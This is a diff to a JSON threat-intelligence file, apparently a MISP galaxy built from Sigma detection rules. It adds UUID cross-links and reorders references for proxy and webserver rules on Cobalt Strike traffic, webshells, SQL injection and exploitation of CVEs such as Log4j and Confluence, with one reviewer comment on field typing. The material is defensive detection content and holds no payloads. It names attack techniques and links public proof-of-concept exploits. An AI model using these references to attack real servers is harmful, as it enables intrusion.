@@ -58718,6 +75725,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", "value": "Crypto Miner User Agent" }, @@ -58769,6 +75785,36 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", "value": "iOS Implant URL Pattern" }, @@ -58794,6 +75840,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", "value": "CobaltStrike Malformed UAs in Malleable Profiles" }, 
@@ -58821,6 +75876,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", "value": "Raw Paste Service Access" }, @@ -58846,6 +75924,15 @@ "attack.t1590" ] }, + "related": [ + { + "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "value": "Advanced IP/Port Scanner Update Check" }, @@ -58863,9 +75950,9 @@ "logsource.product": "No established product", "refs": [ "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://www.spamhaus.org/statistics/tlds/", "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", - "https://www.spamhaus.org/statistics/tlds/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ 
@@ -58876,8 +75963,24 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", - "value": "Download from Suspicious TLD" + "value": "Download From Suspicious TLD - Blacklist" }, { "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", @@ -58915,8 +76018,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" ], "tags": [ @@ -58925,6 +76028,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" }, 
@@ -58951,6 +76063,29 @@ "attack.t1102.003" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "value": "PwnDrp Access" }, @@ -58976,6 +76111,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", "value": "CobaltStrike Malleable (OCSP) Profile" }, @@ -59002,6 +76146,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8557060-9221-4448-8794-96320e6f3e74", "value": "Windows PowerShell User Agent" }, @@ -59049,6 +76202,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", "value": "BabyShark Agent Pattern" }, 
@@ -59065,8 +76227,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" ], "tags": [ @@ -59076,6 +76238,15 @@ "attack.t1110" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", "value": "Hack Tool User Agent" }, @@ -59102,6 +76273,22 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", "value": "APT40 Dropbox Tool User Agent" }, @@ -59130,6 +76317,22 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", "value": "Ursnif Malware C2 URL Pattern" }, 
@@ -59155,6 +76358,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", "value": "Empty User Agent" }, @@ -59183,6 +76395,22 @@ "attack.t1036.005" ] }, + "related": [ + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", "value": "Flash Player Update from Suspicious Location" }, @@ -59199,8 +76427,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://paper.seebug.org/1495/", "https://twitter.com/wugeej/status/1369476795255320580", + "https://paper.seebug.org/1495/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" ], "tags": [ @@ -59209,6 +76437,15 @@ "cve.2021.21978" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", "value": "CVE-2021-21978 Exploitation Attempt" }, @@ -59226,8 +76463,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" ], "tags": [ 
@@ -59262,6 +76499,15 @@ "cve.2020.14882" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", "value": "Oracle WebLogic Exploit CVE-2020-14882" }, @@ -59278,10 +76524,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", - "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", + "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml" ], "tags": [ @@ -59289,6 +76535,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "38825179-3c78-4fed-b222-2e2166b926b1", "value": "Potential CVE-2021-26084 Exploitation Attempt" }, @@ -59313,6 +76568,15 @@ "attack.initial_access" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f55f047-112b-4101-ad32-43913f52db46", "value": "SonicWall SSL/VPN Jarrewrite Exploit" }, 
@@ -59338,6 +76602,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", "value": "Exchange Exploitation Used by HAFNIUM" }, @@ -59354,8 +76627,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://www.anquanke.com/post/id/226029", + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" ], "tags": [ @@ -59391,6 +76664,15 @@ "cve.2018.2894" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", "value": "Oracle WebLogic Exploit" }, @@ -59407,9 +76689,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", "https://dmaasland.github.io/posts/citrix.html", "https://support.citrix.com/article/CTX276688", + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" ], "tags": [ 
@@ -59417,6 +76699,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" }, @@ -59433,8 +76724,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/search?q=CVE-2021-43798", "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/search?q=CVE-2021-43798", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" ], "tags": [ @@ -59442,6 +76733,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", "value": "Grafana Path Traversal Exploitation CVE-2021-43798" }, @@ -59480,10 +76780,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://twitter.com/Al1ex4/status/1382981479727128580", + "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/", "https://twitter.com/sec715/status/1373472323538362371", - "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", - "https://twitter.com/Al1ex4/status/1382981479727128580", "https://github.com/murataydemir/CVE-2021-27905", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml" ], 
@@ -59493,6 +76793,15 @@ "cve.2021.27905" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0bbcd74b-0596-41a4-94a0-4e88a76ffdb3", "value": "Potential CVE-2021-27905 Exploitation Attempt" }, @@ -59509,8 +76818,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", "https://www.yang99.top/index.php/archives/82/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" ], @@ -59520,6 +76829,15 @@ "cve.2022.27925" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" }, 
@@ -59536,10 +76854,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html",
 "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/",
- "https://twitter.com/_0xf4n9x_/status/1572052954538192901",
 "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/",
+ "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html",
+ "https://twitter.com/_0xf4n9x_/status/1572052954538192901",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml"
 ],
 "tags": [
@@ -59548,6 +76866,15 @@
 "cve.2022.36804"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685",
 "value": "Atlassian Bitbucket Command Injection Via Archive API"
 },
@@ -59566,10 +76893,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/",
- "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/",
 "https://github.com/payloadbox/sql-injection-payload-list",
 "https://brightsec.com/blog/sql-injection-payloads/",
+ "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/",
+ "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml"
 ],
 "tags": "No established tags"
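Review bot: In the last hunk here (the SQL-injection-in-access-logs entry) `tags` is the string `"No established tags"`, while every other entry touched by this patch has `tags` as an array, and that type split is presumably why this is the only webserver rule in the section that gets no `related` block. A field that is sometimes a string and sometimes an array forces every consumer of `meta.tags` to special-case the sentinel; emitting `"tags": []` (and similarly `[]` or omission instead of `"No established product"` / `"No established category"`) would keep each key single-typed. The sentinel predates this commit, but the generator change that now derives `related` from `tags` is the natural place to normalise it. The entry's closing lines fall outside the hunk.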
@@ -59590,9 +76917,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_poc_exploitation.yml" ], "tags": [ @@ -59600,6 +76927,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "92d78c63-5a5c-4c40-9b60-463810ffb082", "value": "OWASSRF Exploitation Attempt Using Public POC - Webserver" }, @@ -59626,6 +76962,15 @@ "cve.2021.26814" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", "value": "Exploitation of CVE-2021-26814 in Wazuh" }, @@ -59651,6 +76996,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "181f49fa-0b21-4665-a98c-a57025ebb8c7", "value": "Potential OWASSRF Exploitation Attempt - Webserver" }, 
@@ -59667,8 +77021,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" ], "tags": [ @@ -59676,6 +77030,15 @@ "attack.t1499.004" ] }, + "related": [ + { + "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", "value": "Nginx Core Dump" }, @@ -59701,6 +77064,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" }, @@ -59726,6 +77098,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", "value": "CVE-2010-5278 Exploitation Attempt" }, 
@@ -59742,8 +77123,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" ], "tags": [ @@ -59767,9 +77148,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://support.f5.com/csp/article/K52145254", "https://twitter.com/yorickkoster/status/1279709009151434754", "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://support.f5.com/csp/article/K52145254", "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" ], @@ -59778,6 +77159,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" }, 
@@ -59794,9 +77184,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", - "https://swarm.ptsecurity.com/unauth-rce-vmware", "https://f5.pm/go-59627.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" ], "tags": [ @@ -59804,6 +77194,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", "value": "CVE-2021-21972 VSphere Exploitation" }, @@ -59828,6 +77227,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", "value": "Multiple Suspicious Resp Codes Caused by Single Client" }, @@ -59855,6 +77263,15 @@ "cve.2022.46169" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "738cb115-881f-4df3-82cc-56ab02fc5192", "value": "Potential CVE-2022-46169 Exploitation Attempt" }, 
@@ -59871,12 +77288,12 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", "https://github.com/YfryTchsGD/Log4jAttackSurface", + "https://twitter.com/shutingrz/status/1469255861394866177?s=21", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" ], "tags": [ @@ -59884,6 +77301,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", "value": "Log4j RCE CVE-2021-44228 in Fields" }, @@ -59932,6 +77358,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", "value": "Pulse Secure Attack CVE-2019-11510" }, 
@@ -59948,10 +77383,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", - "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" ], "tags": [ @@ -59983,6 +77418,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", "value": "Exchange Exploitation CVE-2021-28480" }, @@ -60023,8 +77467,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" ], "tags": [ @@ -60033,6 +77477,15 @@ "cve.2021.2109" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "687f6504-7f44-4549-91fc-f07bab065821", "value": "Oracle WebLogic Exploit CVE-2021-2109" }, 
